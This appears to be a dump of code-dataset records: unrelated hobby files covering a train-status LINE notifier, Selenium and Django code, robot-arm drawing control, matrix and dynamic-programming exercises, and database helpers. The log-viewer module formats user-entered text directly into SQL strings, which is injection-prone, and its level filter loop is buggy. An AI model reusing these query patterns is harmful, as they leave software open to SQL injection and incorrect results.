emulate_mitm.run_symmetric_encryption()\n self.assertTrue(mitm_encryption_results)","sub_path":"Tests/test_emulation.py","file_name":"test_emulation.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"278338224","text":"# encoding: utf-8\n\"\"\"\n最大子数列问题的目标是在数列的一维方向找到一个连续的子数列,使该子数列的和最大\nhttps://blog.51cto.com/u_14724308/4740310#:~:text=%E6%9C%80%E5%A4%A7%E5%AD%90%E5%BA%8F%E5%88%97%E5%92%8C%E6%98%AF,%E8%BF%9E%E7%BB%AD%E5%AD%90%E6%95%B0%E7%BB%84%E6%9C%80%E5%A4%A7%E5%92%8C%E3%80%82\n\n1. 初始化0list;\n2. 对第一个状态值赋值;\n3. 判断上一个状态值是否小于0\n4. 小于就需要重新开始,将当前只给到状态,否则就需要相加前1历史状态;\n5. 每次循环更新最大值;\n\"\"\"\n\narr = [1, -1, -2, 10, 2, -3, 5]\ntable = [0] * len(arr)\ntable[0] = arr[0]\nmaxvalue = arr[0]\nfor i in range(1, len(arr)):\n # 更新dp表\n if table[i - 1] < 0:\n table[i] = arr[i] # 舍弃前面部分重新开始\n else:\n table[i] = table[i - 1] + arr[i] # 新加入\n # 更新最大值\n maxvalue = max(maxvalue, table[i])\nprint(maxvalue)","sub_path":"algo/动态规划1/2最大连续子数列和.py","file_name":"2最大连续子数列和.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"625182989","text":"## coding: UTF-8\n# スクレイピングに必要なモジュールをインポート\nimport urllib.request as req\n#from urllib3 import request\nimport sys\nsys.path.append('/home/pi/.local/lib/python3.5/site-packages/')\nfrom bs4 import BeautifulSoup\nimport requests\n\n#ここに自分のtokenを入力\nline_notify_token = ''\n\n#https://transit.yahoo.co.jp/traininfo/detail/82/0/の82の数値を変えることで東武東上線以外の路線に変更できます。\nurl = \"https://transit.yahoo.co.jp/traininfo/detail/82/0/\"\nres = req.urlopen(url)\n#res = request.urlopen(url)\nsoup = BeautifulSoup(res, \"lxml\")\n\ntrain = soup.select_one(\"#main > div.mainWrp > div.labelLarge > h1\").text\nprint(train)\nstatus = soup.select_one(\"#mdServiceStatus > dl > dt\").text\nprint(status)\n\ninfo = soup.select_one(\"#mdServiceStatus > dl > dd > p\").text\nprint(info)\nprint(str(train) + \":\" + str(status) + \" \" + str(info))\n#message1()\n\nline_notify_api = 'https://notify-api.line.me/api/notify'\nmessage = str(train) + \":\" + str(status) + \" \" + str(info)\n\nif not status == \"[○]平常運転\":\n payload = {'message': message}\n headers = {'Authorization': 'Bearer ' + line_notify_token}\n line_notify = requests.post(line_notify_api,data = payload,headers=headers)","sub_path":"venv/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"431448862","text":"from selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.support.wait import WebDriverWait\n\n\ndef test_1():\n\n chrome_options = Options()\n chrome_options.add_argument(\"--window-size=1600,900\")\n driver = webdriver.Chrome(executable_path='/Users/dmitrijanaskin/PycharmProjects/lessons/webdrivers/chromedriver',\n chrome_options=chrome_options)\n driver.get('https://yandex.ru')\n\n def get_element(xpath):\n try:\n element = WebDriverWait(driver, 20).until(\n expected_conditions.presence_of_element_located((By.XPATH, xpath)))\n except TimeoutException:\n element = driver.find_element(By.XPATH, xpath)\n return element\n\n def action(element, *args):\n element_type = element.tag_name\n if element_type == 'input':\n element.send_keys(*args)\n elif element_type == 'button' or element_type == 'a':\n element.click()\n elif element_type == 'select':\n if args[0].__class__ == str:\n Select(element).select_by_value(args[0])\n\n input_search = get_element('//input[@aria-label=\"Запрос\"]')\n button_search = get_element('//button//*[text()=\"Найти\"]/..')\n\n action(input_search, 'википедия')\n action(button_search)\n\n first_result = get_element('((//*[@class=\"main__content\"]//li)[1]//a)[1]')\n action(first_result)\n\n driver.switch_to.window(driver.window_handles[1])\n\n button = get_element('//*[text()=\"Вклад\"]')\n action(button)\n\n def print_tag(element):\n print(element.tag_name)\n\n select = get_element('//*[@class=\"namespaceselector\"]')\n action(select, 'Обусждение')\n\n\n\n\n\n\n\n print()\n\n\n\n","sub_path":"features/steps/tests/test_1.py","file_name":"test_1.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"228892221","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('addresses', '0001_initial'),\n ('courses', '0002_auto_20141208_1034'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Dossier',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('favorite_color', models.CharField(max_length=1, choices=[(b'r', b'red'), (b'o', b'orange'), (b'y', b'yellow'), (b'g', b'green'), (b'b', b'blue'), (b'i', b'indigo'), (b'v', b'violet')])),\n ('address', models.ForeignKey(to='addresses.Address')),\n ('unloved_courses', models.ManyToManyField(to='courses.Course')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"dossiers/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"596708911","text":" #!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport argparse\nimport warnings\nimport ctypes\nimport os\nimport numpy as np\nimport time\nimport argparse\nimport ctypes\nfrom math import sqrt\nimport ik as ik\nfrom draw import *\nfrom dynamixel_sdk import * # Uses Dynamixel SDK library\nfrom skip import skip\nfrom play_sound import *\n\n# Ready to remove\nimport sys\nsys.setrecursionlimit(10000)\n\n# Parameters for Program Drawing\n'''\nBeh: check the best H_draw for the workspace\n'''\n# Pen length = 4.5cm\nH_move = 8.0 # variable + offset ->> 2+4\nH_draw = 1.3 # variable + offset ->> -2.3+4\nfilename = \"Image/prof_low_actual.png\"\n\ndrawer = Drawer(filename,H_draw,H_move,False)\ndrawer.findPath()\n\n# Program Parameters for Dynamixel Servos\nprint_param = False # printing status of Dynamixel Servos\ntesting = False\nmin_X = 9\nmax_X = 35\nmin_Y =-15\nmax_Y = 15\n\nif os.name == 'nt':\n import msvcrt\n\n def getch():\n return msvcrt.getch().decode()\nelse:\n import sys\n import tty\n import termios\n\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n\n\n def getch():\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\ndef user_input(id):\n val = float(input(\n \"Enter Goal Position for Motor {} in degrees (Range is 0 to 300 degrees; 150 degrees is neutral position):\".format(\n id)))\n return val, int(val / 300 * 1023)\n\ndef get_offset(val):\n if 9<=val<=11:\n offset = (-2*val) +19.5\n if 11= BROADCAST_ID:\n # return data, COMM_NOT_AVAILABLE, 0\n\n # txpacket[self.PKT_ID] = dxl_id\n # txpacket[self.PKT_LENGTH] = 4\n # txpacket[self.PKT_INSTRUCTION] = INST_READ\n # txpacket[self.PKT_PARAMETER0 + 0] = address\n # txpacket[self.PKT_PARAMETER0 + 1] = length\n\n # rxpacket, result, error = self.txRxPacket(port, txpacket)\n # if result == COMM_SUCCESS:\n # error = rxpacket[self.PKT_ERROR]\n\n # data.extend(rxpacket[PKT_PARAMETER0: PKT_PARAMETER0 + length])\n\n # return data, result, error\n\n # def txRxPacket(self, port, txpacket):\n # rxpacket = None\n # error = 0\n\n # # tx packet\n # result = self.packetHandler.txPacket(port, txpacket)\n # if result != COMM_SUCCESS:\n # return rxpacket, result, error\n\n # # (Instruction == BulkRead) == this function is not available.\n # if txpacket[self.PKT_INSTRUCTION] == INST_BULK_READ:\n # result = COMM_NOT_AVAILABLE\n\n # # (ID == Broadcast ID) == no need to wait for status packet or not available\n # if (txpacket[self.PKT_ID] == BROADCAST_ID):\n # port.is_using = False\n # return rxpacket, result, error\n\n # # set packet timeout\n # if txpacket[self.PKT_INSTRUCTION] == INST_READ:\n # port.setPacketTimeout(txpacket[self.PKT_PARAMETER0 + 1] + 6)\n # else:\n # port.setPacketTimeout(6) # HEADER0 HEADER1 ID LENGTH ERROR CHECKSUM\n\n # # rx packet\n # while True:\n # rxpacket, result = self.rxPacket(port)\n # if result != COMM_SUCCESS or txpacket[self.PKT_ID] == rxpacket[self.PKT_ID]:\n # break\n\n # if result == COMM_SUCCESS and txpacket[self.PKT_ID] == rxpacket[self.PKT_ID]:\n # error = rxpacket[self.PKT_ERROR]\n\n # return rxpacket, result, error\n\n # def rxPacket(self, port):\n # rxpacket = []\n\n # result = COMM_TX_FAIL\n # checksum = 0\n # rx_length = 0\n # wait_length = 10 # minimum length (HEADER0 HEADER1 ID LENGTH ERROR CHKSUM)\n # # FIX: CHANGED 6 TO 10 for read_pos\n\n # while True:\n # rxpacket.extend(port.readPort(wait_length - rx_length))\n # rx_length = len(rxpacket)\n # if rx_length >= wait_length:\n # # find packet header\n # for idx in range(0, (rx_length - 1)):\n # if (rxpacket[idx] == 0xFF) and (rxpacket[idx + 1] == 0xFF):\n # break\n\n # if idx == 0: # found at the beginning of the packet\n # if (rxpacket[self.PKT_ID] > 0xFD) or (rxpacket[self.PKT_LENGTH] > RXPACKET_MAX_LEN) or (\n # rxpacket[self.PKT_ERROR] > 0x7F):\n # # unavailable ID or unavailable Length or unavailable Error\n # # remove the first byte in the packet\n # del rxpacket[0]\n # rx_length -= 1\n # continue\n\n # # re-calculate the exact length of the rx packet\n # if wait_length != (rxpacket[self.PKT_LENGTH] + self.PKT_LENGTH + 1):\n # wait_length = rxpacket[self.PKT_LENGTH] + self.PKT_LENGTH + 1\n # continue\n\n # if rx_length < wait_length:\n # # check timeout\n # if port.isPacketTimeout():\n # if rx_length == 0:\n # result = COMM_RX_TIMEOUT\n # else:\n # result = COMM_RX_CORRUPT\n # break\n # else:\n # continue\n\n # # calculate checksum\n # for i in range(2, wait_length - 1): # except header, checksum\n # checksum += rxpacket[i]\n # checksum = ~checksum & 0xFF\n\n # # verify checksum\n # if rxpacket[wait_length - 1] == checksum:\n # result = COMM_SUCCESS\n # else:\n # result = COMM_RX_CORRUPT\n # break\n\n # else:\n # # remove unnecessary packets\n # del rxpacket[0: idx]\n # rx_length -= idx\n\n # else:\n # # check timeout\n # if port.isPacketTimeout():\n # if rx_length == 0:\n # result = COMM_RX_TIMEOUT\n # else:\n # result = COMM_RX_CORRUPT\n # break\n\n # port.is_using = False\n\n # #print \"[RxPacket] %r\" % rxpacket\n\n # return rxpacket, result\n # # end fix\n\n # def read_pos(self, id):\n # dxl_present_position, dxl_comm_result, dxl_error = self.read4ByteTxRx(self.portHandler, id, self.ADDR_MX_PRESENT_POSITION)\n # if dxl_comm_result != COMM_SUCCESS:\n # return self.read_pos(id)\n # elif dxl_error != 0:\n # return self.read_pos(id)\n # else:\n # if(dxl_present_position > 1023 or dxl_present_position<0):\n # return self.read_pos(id)\n # return dxl_present_position, dxl_comm_result, dxl_error\n\n # Set servo move speed\n def set_joint_speed(self, id, speed):\n dxl_comm_result, dxl_error = self.packetHandler.write2ByteTxRx(self.portHandler, id, self.ADDR_AX12A_MOVE_SPEED,\n int(speed))\n # print(\"Set Speed \",id,'---',dxl_comm_result,'---',dxl_error)\n if dxl_comm_result != COMM_SUCCESS:\n return self.set_joint_speed(id, speed)\n elif dxl_error != 0:\n return self.set_joint_speed(id, speed)\n else:\n # print(\"Dynamixel#%d speed has been set: %s\" % (id, speed))\n return 1\n\n def enable_servo_torque(self, id):\n dxl_comm_result, dxl_error = self.packetHandler.write1ByteTxRx(self.portHandler, id, self.ADDR_MX_TORQUE_ENABLE,\n self.TORQUE_ENABLE)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % self.packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % self.packetHandler.getRxPacketError(dxl_error))\n else:\n print(\"Dynamixel#%d has been successfully connected\" % id)\n\n def disable_servo_torque(self, id):\n dxl_comm_result, dxl_error = self.packetHandler.write1ByteTxRx(self.portHandler, id, self.ADDR_MX_TORQUE_ENABLE,\n self.TORQUE_DISABLE)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % self.packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % self.packetHandler.getRxPacketError(dxl_error))\n\n # Function to setup parameters for dynamixel sync write\n def add_params(self, id,params):\n dxl_addparam_result = self.groupSyncWrite.addParam(id, params)\n if dxl_addparam_result != True:\n print(\"[ID:%03d] groupSyncWrite addparam failed. Retrying...\" % id)\n self.add_params(id,params)\n\n def goal_send(self,id,position):\n _, _ = self.packetHandler.write2ByteTxRx(self.portHandler, id, self.ADDR_MX_GOAL_POSITION, position)\n\n def print_status(self, id, goal_position, present_position):\n print(\"[ID: {} GoalPos: {:.03f} PresPos: {:.03f} ]\".format(id, goal_position, present_position))\n\ndef move_to(status_moving):\n # Allocate goal position value into byte array\n param_goal_position_6 = [DXL_LOBYTE(DXL_LOWORD(GoalPosition_6)), DXL_HIBYTE(DXL_LOWORD(\n GoalPosition_6)), DXL_LOBYTE(DXL_HIWORD(GoalPosition_6)), DXL_HIBYTE(DXL_HIWORD(GoalPosition_6))]\n param_goal_position_1 = [DXL_LOBYTE(DXL_LOWORD(GoalPosition_1)), DXL_HIBYTE(DXL_LOWORD(\n GoalPosition_1)), DXL_LOBYTE(DXL_HIWORD(GoalPosition_1)), DXL_HIBYTE(DXL_HIWORD(GoalPosition_1))]\n param_goal_position_2 = [DXL_LOBYTE(DXL_LOWORD(GoalPosition_2)), DXL_HIBYTE(DXL_LOWORD(\n GoalPosition_2)), DXL_LOBYTE(DXL_HIWORD(GoalPosition_2)), DXL_HIBYTE(DXL_HIWORD(GoalPosition_2))]\n param_goal_position_3 = [DXL_LOBYTE(DXL_LOWORD(GoalPosition_3)), DXL_HIBYTE(DXL_LOWORD(\n GoalPosition_3)), DXL_LOBYTE(DXL_HIWORD(GoalPosition_3)), DXL_HIBYTE(DXL_HIWORD(GoalPosition_3))]\n \n if status_moving:\n # print(\"one by one\")\n servo.goal_send(servo.DXL_ID_6, GoalPosition_6)\n servo.goal_send(servo.DXL_ID_3, GoalPosition_3)\n servo.goal_send(servo.DXL_ID_1, GoalPosition_1)\n servo.goal_send(servo.DXL_ID_2, GoalPosition_2)\n else:\n # Send goal to syncwrite storage\n servo.add_params(servo.DXL_ID_6, param_goal_position_6)\n servo.add_params(servo.DXL_ID_1, param_goal_position_1)\n servo.add_params(servo.DXL_ID_2, param_goal_position_2)\n servo.add_params(servo.DXL_ID_3, param_goal_position_3)\n\n # Syncwrite goal position\n dxl_comm_result = servo.groupSyncWrite.txPacket()\n\n if dxl_comm_result != COMM_SUCCESS:\n print(\"dynamixel_write result error %s\" % servo.packetHandler.getTxRxResult(dxl_comm_result))\n \n # Clear syncwrite parameter storage\n servo.groupSyncWrite.clearParam()\n\n wait = time.time()\n # print(\"Time: {}\".format(wait))\n\n while 1:\n # Read present position\n dxl_present_position_6, _, _ = servo.read_pos(servo.DXL_ID_6)\n dxl_present_position_1, _, _ = servo.read_pos(servo.DXL_ID_1)\n dxl_present_position_2, _, _ = servo.read_pos(servo.DXL_ID_2)\n dxl_present_position_3, _, _ = servo.read_pos(servo.DXL_ID_3)\n\n dxl_present_position_6_deg = dxl_present_position_6 / 1023.0 * 300.0\n dxl_present_position_1_deg = dxl_present_position_1 / 1023.0 * 300.0\n dxl_present_position_2_deg = dxl_present_position_2 / 1023.0 * 300.0\n dxl_present_position_3_deg = dxl_present_position_3 / 1023.0 * 300.0\n\n # Print Statues\n if print_param:\n servo.print_status(servo.DXL_ID_3, GoalPosition_3_deg, dxl_present_position_3_deg)\n servo.print_status(servo.DXL_ID_6, GoalPosition_6_deg, dxl_present_position_6_deg)\n servo.print_status(servo.DXL_ID_2, GoalPosition_2_deg, dxl_present_position_2_deg)\n servo.print_status(servo.DXL_ID_1, GoalPosition_1_deg, dxl_present_position_1_deg)\n\n status_6 = (abs(GoalPosition_6 - dxl_present_position_6) <= servo.DXL_MOVING_STATUS_THRESHOLD)\n print(\"--Servo 6 Status: {}--\".format(status_6))\n \n if ((abs(GoalPosition_6 - dxl_present_position_6) <= servo.DXL_MOVING_STATUS_THRESHOLD) and \\\n (abs(GoalPosition_1 - dxl_present_position_1) <= servo.DXL_MOVING_STATUS_THRESHOLD) and \\\n (abs(GoalPosition_2 - dxl_present_position_2) <= servo.DXL_MOVING_STATUS_THRESHOLD) and \\\n (abs(GoalPosition_3 - dxl_present_position_3) <= servo.DXL_MOVING_STATUS_THRESHOLD)):\n break\n elif time.time() - wait > 10:\n print(\"arm is Blocked, breaking loop\")\n break\n\ndef set_variable_speed():\n # Read Pos of Servo\n dxl6_present_position, _, _ = servo.read_pos(servo.DXL_ID_6)\n dxl1_present_position, _, _ = servo.read_pos(servo.DXL_ID_1)\n dxl2_present_position, _, _ = servo.read_pos(servo.DXL_ID_2)\n dxl3_present_position, _, _ = servo.read_pos(servo.DXL_ID_3)\n \n diff3 = abs(GoalPosition_3-dxl3_present_position)\n diff2 = abs(GoalPosition_2-dxl2_present_position)\n diff1 = abs(GoalPosition_1-dxl1_present_position)\n diff6 = abs(GoalPosition_6-dxl6_present_position)\n\n reduct = 1\n # print(\"Angle difference is %s and reduction value is %s\" %([diff1,diff2,diff3,diff6],reduct))\n if diff1 > 100:\n # print(\"apply speed limit 1\")\n diff2 = diff2 * reduct * 100/diff1\n diff3 = diff3 * reduct * 100/diff1\n diff6 = diff6 * reduct * 100/diff1\n diff1 = diff1 * reduct * 100/diff1\n if diff2 > 100:\n # print(\"apply speed limit 2\")\n diff1 = diff1 * reduct * 100/diff2\n diff3 = diff3 * reduct * 100/diff2\n diff6 = diff6 * reduct * 100/diff2\n diff2 = diff2 * reduct * 100/diff2\n if diff3 > 100:\n # print(\"apply speed limit 3\")\n diff1 = diff1 * reduct * 100/diff3\n diff2 = diff2 * reduct * 100/diff3\n diff6 = diff6 * reduct * 100/diff3\n diff3 = diff3 * reduct * 100/diff3\n if diff6 > 100:\n # print(\"apply speed limit 4\")\n diff1 = diff1 * reduct * 100/diff6\n diff2 = diff2 * reduct * 100/diff6\n diff3 = diff3 * reduct * 100/diff6\n diff6 = diff6 * reduct * 100/diff6\n\n diff1 = int(diff1)\n diff2 = int(diff2)\n diff3 = int(diff3)\n diff6 = int(diff6)\n\n if (diff1 == 0):\n diff1 = 1\n if (diff2 == 0):\n diff2 = 1\n if (diff3 == 0):\n diff3 = 1\n if (diff6 == 0):\n diff6 = 1\n\n servo.set_joint_speed(servo.DXL_ID_1,(diff1))\n servo.set_joint_speed(servo.DXL_ID_2,(diff2))\n servo.set_joint_speed(servo.DXL_ID_3,(diff3))\n servo.set_joint_speed(servo.DXL_ID_6,(diff6))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Dynamixel Servo Control')\n parser.add_argument('--user_input', action='store_false', help='ignore this argument in order to ask goal from program')\n args = parser.parse_args()\n\n servo = Dynamixel(args)\n\n # Enable Dynamixel Torque\n servo.enable_servo_torque(servo.DXL_ID_6)\n servo.enable_servo_torque(servo.DXL_ID_1)\n servo.enable_servo_torque(servo.DXL_ID_2)\n servo.enable_servo_torque(servo.DXL_ID_3)\n\n # Set Speed of Servo\n joint_speed = 40\n servo.set_joint_speed(servo.DXL_ID_6, joint_speed)\n servo.set_joint_speed(servo.DXL_ID_3, joint_speed)\n servo.set_joint_speed(servo.DXL_ID_2, joint_speed)\n servo.set_joint_speed(servo.DXL_ID_1, joint_speed)\n\n # Go to home position \n GoalPosition_3_deg, GoalPosition_3=program_input(150)\n GoalPosition_1 = GoalPosition_6 = GoalPosition_2 = GoalPosition_3\n GoalPosition_1_deg = GoalPosition_6_deg = GoalPosition_2_deg = GoalPosition_3_deg\n set_variable_speed() # -> test\n move_to(True)\n\n while 1:\n if servo.user_input:\n # User input goal position\n GoalPosition_3_deg, GoalPosition_3 = user_input(3)\n GoalPosition_6_deg, GoalPosition_6 = user_input(6)\n GoalPosition_2_deg, GoalPosition_2 = user_input(2)\n GoalPosition_1_deg, GoalPosition_1 = user_input(1)\n\n set_variable_speed()\n\n move_to(True) # True: Not syncwrite\n\n else: \n if not testing:\n print(\"Start drawing\")\n # Drawing from input image\n arr = drawer.draw()\n\n print(\"Number of point to IK: {}\".format(len(arr)))\n arr=np.asarray(arr)\n\n # Factor x coordinate & y coordinate\n for i in arr:\n i[0] = i[0]*0.05\n i[1] = i[1]*0.05\n\n arr = np.round(arr,1) \n\n arr = arr.tolist() \n arr = skip(arr,drawer.h_move,drawer.h_draw)\n print(\"After F Number of point to IK: {}\".format(len(arr)))\n arr=np.asarray(arr)\n\n offset_y , offset_x = plot(arr,False,False)\n\n # Array slicing here!!! \n # arr=arr[200:]\n \n \n else:\n print(\"Testing\")\n arr = [[min_X,max_Y,H_move],\n [min_X,max_Y,H_draw],\n [min_X,min_Y,H_draw],\n [max_X,min_Y,H_draw],\n [max_X,max_Y,H_draw],\n [min_X,max_Y,H_draw],\n [min_X,max_Y,H_move]]\n\n size_arr = len(arr)\n arr_store = arr \n\n for index, i in enumerate(arr):\n if(int(i[2])==int(H_move) or int(arr_store[index-1][2])==int(H_move)):\n status_move = True\n else:\n status_move = False\n\n if print_param: \n print(\"Status_move :{}\".format(status_move))\n\n if not testing:\n # Drawing from input image\n print(\"Start sending the point\")\n # x_coor = int(i[0])+ offset_x\n # y_coor = int(i[1])-offset_y\n y_coor = int(i[0])-offset_y\n x_coor = int(i[1])+offset_x\n print(\"From Drawing for point {}/{}:\".format(index+1,size_arr),i[0]+10-4, i[1]-15,i[2])\n arr = ik.get_inverse(i[1]+offset_x, i[0]-offset_y,i[2]) \n\n else:\n x_coor = int(i[0])\n y_coor = int(i[1])\n\n print(\"From Drawing: \",i[0], i[1],i[2])\n val = sqrt(i[0]**2 + i[1]**2)\n offset = get_offset(val)\n print(\"val: {0} offset:{1}\".format(val,offset))\n \n arr = ik.get_inverse(i[0], i[1],i[2]) \n\n arr[3] = -arr[3]\n arr = [i + 150.0 for i in arr]\n # print(\"From IK(after +150): \",arr)\n \n GoalPosition_3_deg, GoalPosition_3 = program_input(arr[0])\n GoalPosition_6_deg, GoalPosition_6 = program_input(arr[1])\n GoalPosition_2_deg, GoalPosition_2 = program_input(arr[2])\n GoalPosition_1_deg, GoalPosition_1 = program_input(arr[3])\n\n set_variable_speed()\n\n if not testing:\n if ((x_coor>min_X or x_coormin_Y or y_coor= '{}' \".format(start_time)\n if end_time and start_time != \"00:00:00\" and start_time < end_time:\n sql += \"and time <= '{}' \".format(end_time)\n if len(level_list) > 0:\n for l in level_list:\n level = \"'\" + l + \"',\"\n \n print(level[:-1])\n sql += \"and level in ({}) \".format(level[:-1])\n \n return self.run_sql(sql)\n\n def modify_cmd(self):\n reply_type = 1\n if self.rb_random.isChecked():\n reply_type = 2\n self.run_sql(\"update cmd set value ='{}', remark='{}', reply_type ='{}' where id='{}'\".format(self.le_value.text(), self.le_remark.text(), reply_type, self.id))\n \n def run_sql(self, sql): \n conn = sqlite3.connect(self.db_file)\n cs = conn.cursor()\n print(\"execute sql:\" + sql)\n cs.execute(sql)\n if \"select\" in sql:\n return cs.fetchall() \n conn.commit()\n","sub_path":"kdJavaLogViewer/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"29023127","text":"#!/usr/bin/env python3\n\nimport os\nimport multiprocessing\nimport numpy as np\n\ndef random_file(para):\n np.random.seed(50)\n filename, size_mb = para\n with open(filename,'wb') as fl:\n for _ in range(size_mb):\n mb = np.random.bytes(1024*1024)\n fl.write(mb)\n print(\"created {0}\".format(filename))\n return\n\nif __name__ == \"__main__\":\n DIR = \"test_data\"\n N_FILE = 10\n SIZE_MB = 100\n\n try:\n os.mkdir(DIR)\n except:\n pass\n\n para = []\n for n in range(N_FILE):\n fl_name = os.path.join(DIR, \"file_öäüß_{0}.rnd\".format(n))\n para.append( (fl_name, SIZE_MB) )\n\n p = multiprocessing.Pool()\n list(p.imap_unordered(random_file, para))\n\n","sub_path":"tools/create_test_data.py","file_name":"create_test_data.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"377293612","text":"import behavior\nimport role_assignment\nimport re\n\n\nclass SingleRobotBehavior(behavior.Behavior):\n def __init__(self, continuous):\n super().__init__(continuous)\n self._robot = None\n\n def execute_running(self):\n if self.robot == None:\n raise AssertionError(\n \"Error: execute_running() called on a single robot behavior that doesn't have a robot!\")\n\n @property\n def robot(self):\n return self._robot\n\n @robot.setter\n def robot(self, value):\n self._robot = value\n\n def role_requirements(self):\n reqs = role_assignment.RoleRequirements()\n if self.robot != None:\n reqs.previous_shell_id = self.robot.shell_id()\n return reqs\n\n # assignments is a (RoleRequirements, OurRobot) tuple\n def assign_roles(self, assignments):\n if not isinstance(assignments, tuple) or len(assignments) > 2:\n raise AssertionError(\n \"Invalid call to assign_roles. Expected a tuple\")\n if len(assignments) == 2:\n import robocup\n if assignments[1] != None and not isinstance(assignments[1],\n robocup.OurRobot):\n raise TypeError(\n \"ERROR: attempt to assign robot to a non-robot object value: \"\n + str(assignments[1]))\n self.robot = assignments[1]\n\n def __str__(self):\n desc = super().__str__()\n desc += \"[robot=\" + (str(self.robot.shell_id())\n if self.robot != None else \"None\") + \"]\"\n if self.robot != None:\n indent = ' '\n cmd_text = self.robot.get_cmd_text()[:-1]\n if len(cmd_text) > 0:\n cmd_text = re.sub(r'\\n', '\\n' + indent, '\\n' + cmd_text)\n desc += cmd_text\n return desc\n","sub_path":"soccer/gameplay/single_robot_behavior.py","file_name":"single_robot_behavior.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"516044376","text":"##\n## EPITECH PROJECT, 2020\n## 108\n## File description:\n## mul_matrices.py\n##\n\ndef get_result_line(matrice):\n result_line = []\n for x in range(len(matrice[0])):\n result_line.append(0)\n return result_line\n\ndef get_result_matrice(mat_one, mat_two):\n result_mat = []\n for x in range(len(mat_one)):\n result_mat.append(get_result_line(mat_two))\n return result_mat\n\ndef check_one_line(mat):\n tmp = []\n tmp.append(mat)\n try:\n len(tmp[0][0])\n except TypeError:\n return tmp\n return mat\n\ndef mul_mat(mat_one, mat_two):\n mat_one = check_one_line(mat_one)\n mat_two = check_one_line(mat_two)\n result = get_result_matrice(mat_one, mat_two)\n\n for x in range(len(mat_one)):\n for i in range(len(mat_two[0])):\n for n in range(len(mat_two)):\n result[x][i] += mat_one[x][n] * mat_two[n][i]\n return result\n","sub_path":"108trigo/src/operator_matrice/mul_matrices.py","file_name":"mul_matrices.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"596103324","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom . import forms\nfrom django.views.generic import FormView\n\n\n\n\ndef flames(request):\n form = forms.Flames(request.POST)\n if form.is_valid():\n form.save()\n your_name = form.cleaned_data['your_name']\n partner_name = form.cleaned_data['partner_name']\n # print(your_name)\n # print(partner_name)\n your_name = [i for i in your_name.lower()]\n partner_name = [i for i in partner_name.lower()]\n\n for i in range(len(your_name)):\n for i in your_name:\n if i in partner_name:\n your_name.remove(i)\n partner_name.remove(i)\n # print(your_name)\n # print(partner_name)\n\n\n count = len(your_name) + len(partner_name)\n flames = ['f','l','a','m','e','s']\n\n for i in range(5):\n value = (count % len(flames)) - 1\n flames.remove(flames[value])\n if(value>0):\n flames = flames[value:] + flames[:value]\n flames = flames[0]\n f_dict = {\n 'f': 'FRIENDSHIP',\n 'l': 'LOVE',\n 'a': 'AFFECTION',\n 'm': 'Marriage',\n 'e': 'Enemy',\n 's': 'Sister (Siblings)'\n }\n if (your_name != partner_name):\n out = f_dict[flames]\n elif (your_name == partner_name):\n out = \" Don't try to FOOL me, You love yourslef the most\"\n return render(request,\"flames.html\",{\"flames\" : out})\n return render(request,\"flames.html\",{'Form':form})\n\n\n","sub_path":"flames/calculator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"556300746","text":"# -*- coding: utf-8 -*-\nimport pymysql\nimport dbconfig\nimport datetime\nclass DBHelper:\n\n def connect(self,database=\"crimemap\"):\n connection = pymysql.connect(host='localhost',\n user=dbconfig.db_user,\n password=dbconfig.db_password,\n database=dbconfig.db_name)\n return connection\n\n def get_all_crimes(self):\n connection = self.connect()\n try:\n query = \"SELECT * FROM crimes;\"\n with connection.cursor() as cursor:\n cursor.execute(query)\n json_crimes = []\n for crime in cursor:\n json_crimes.append({\n 'id' : crime[0],\n 'category' : crime[1],\n 'title' : crime[2],\n 'latitude' : crime[3],\n 'longitude' : crime[4],\n 'date' : datetime.datetime.strftime(crime[5], '%d-%m-%y'),\n 'description' : crime[6],\n 'added' : datetime.datetime.strftime(crime[7], 